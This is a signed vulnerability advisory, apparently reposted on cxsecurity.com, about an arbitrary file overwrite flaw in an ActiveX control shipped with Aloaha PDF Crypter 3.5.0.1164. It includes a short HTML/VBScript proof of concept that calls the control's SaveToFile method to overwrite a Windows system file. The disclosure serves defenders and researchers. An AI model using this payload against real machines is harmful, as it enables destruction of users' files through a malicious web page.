Aloaha PDF Crypter 3.5.0.1164 File Overwrite

2013.01.25
Credit: shinnai
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================================ TITLE: ============================================================================================ Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite url: http://www.aloaha.com/ download: http://www.aloaha.com/download/aloaha_crypter.zip author: shinnai (http://shinnai.altervista.org) ============================================================================================ FILE INFO: ============================================================================================ File: C:\WINDOWS\system32\vbCrypt.dll InternalName: ebCrypt OriginalFilename: ebCrypt.DLL FileVersion: 2.0.0.2087 FileDescription: ebCrypt Main Module Product: ebCrypt ProductVersion: 2.0.0.2087 Language: English (United States) MD5 hash: b262cb93c555c3c9604502d071a783ec ============================================================================================ ACTIVEX INFO: ============================================================================================ ProgID: EbCrypt.eb_c_PRNGenerator.1 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C} Description: eb_c_PRNGenerator Class Safety report: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data ============================================================================================ BUG: ============================================================================================ This activex contains the "SaveToFile" which could be used to overwite arbitrary files on pc users. ============================================================================================ PROOF OF CONCEPT ============================================================================================ <html> <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object> <script language='vbscript'> test.SaveToFile "c:\windows\_system.ini" </script> </html> ============================================================================================ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (MingW32) iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5 TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9 l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh 6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19 GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5 7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J enDko6b3T5jOt6axrWGb =H+Gh -----END PGP SIGNATURE-----

References:

http://cxsecurity.com/issue/WLB-2013010157
http://www.aloaha.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top